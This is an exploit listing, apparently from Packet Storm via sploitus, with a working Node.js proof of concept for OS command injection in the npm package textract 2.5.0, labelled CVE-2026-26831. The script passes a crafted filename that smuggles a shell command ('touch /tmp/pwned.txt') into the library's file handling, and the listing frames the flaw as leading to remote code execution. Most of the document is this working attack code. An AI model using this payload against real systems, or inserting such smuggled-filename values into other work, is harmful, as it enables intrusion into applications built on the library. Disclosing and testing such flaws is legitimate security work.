Share
## https://sploitus.com/exploit?id=PACKETSTORM:219858
==================================================================================================================================
    | # Title     : textract 2.5.0 OS Command Injection via Unsafe Filename Handling Leading to RCE                                  |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.npmjs.com/package/textract                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : In textract version 2.5.0, a security vulnerability allows OS command injection when untrusted file paths are processed by the library.
    
    [+] POC        :  exploit-basic.js
    
    const textract = require('textract');
    
    const maliciousFileName = 'test"; touch /tmp/pwned.txt; echo ".doc';
    
    console.log("[+] CVE-2026-26831 - textract OS Command Injection Exploit");
    console.log("[+] Malicious filename:", maliciousFileName);
    console.log("[+] Attempting to extract text from malicious file...");
    
    
    textract.fromFileWithPath(maliciousFileName, { preserveLineBreaks: true }, (error, text) => {
        if (error) {
            console.log("[!] Extraction failed (but command may have executed)");
            console.log("Error:", error.message);
        } else {
            console.log("[+] Extraction completed (injection might still have worked)");
            console.log("Extracted text:", text);
        }
        
        console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
    });
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================